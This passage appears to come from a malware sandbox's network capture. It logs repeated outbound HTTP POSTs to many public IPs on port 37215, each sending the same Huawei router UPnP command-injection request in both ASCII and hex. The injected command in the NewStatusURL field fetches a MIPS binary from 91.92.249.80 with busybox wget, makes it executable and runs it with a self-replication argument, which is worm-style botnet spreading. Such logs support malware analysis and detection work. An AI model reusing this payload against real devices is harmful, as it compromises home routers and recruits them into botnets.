                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1686192.168.2.2333332165.72.70.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535511017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1687192.168.2.2347506177.101.30.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535517931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1688192.168.2.235918841.33.228.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535562038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1689192.168.2.2347138157.0.153.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535583973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1690192.168.2.2359040112.211.169.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535599947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1691192.168.2.2347548197.2.177.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535685062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1692192.168.2.2340968197.18.125.7337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535710096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1693192.168.2.2337910157.25.145.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535713911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1694192.168.2.2341264186.34.11.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535713911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1695192.168.2.2352406197.125.222.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535722017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 